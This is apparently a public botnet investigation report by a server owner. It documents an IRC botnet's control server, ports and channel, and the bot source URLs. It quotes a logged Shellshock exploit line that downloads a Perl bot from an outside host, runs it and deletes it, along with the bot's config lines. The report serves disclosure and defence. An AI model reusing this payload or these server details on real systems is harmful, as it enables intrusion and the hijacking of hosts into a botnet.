- http://pastebin.com/SPMkyZ4w - saga continues.. (:
- _____________________________________
- [```` BOTNET INVESTIGATION REPORT ````]
- `````````````````````````````````````
- Date: January 16, 2015
- Botnet type: IRC Bots/Malware
- Botnet control server IP: 64.32.12.57 (Sharktech.net)
- Protocol: IRC
- Port: 80 ( /connect 64.32.12.57 80 -j #new )
- Hacked hosts: >500
- Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w
- Bot url: http://74.208.166.12/bot.txt (mirror: http://pastebin.com/Zbkke58A)
- (u17173405.onlinehome-server.com Numerical: 74.208.166.12)
- Access log:
- 217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'"
- We can clearly see that this is a Shellshock exploitation attempt, and the source code is here:
- http://74.208.166.12/bot.txt ( MIRROR: http://pastebin.com/Zbkke58A )
- From the source code we can clearly see that this is an IRC bot that connects to the following server:
- $servidor='64.32.12.57' unless $servidor;
- my $porta='80';
- my @canais=("#new");
- my @adms=("X","Y");
- my @auth=("*!*@evil");
- Hey, whoever you are, it's the third time I'm reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck.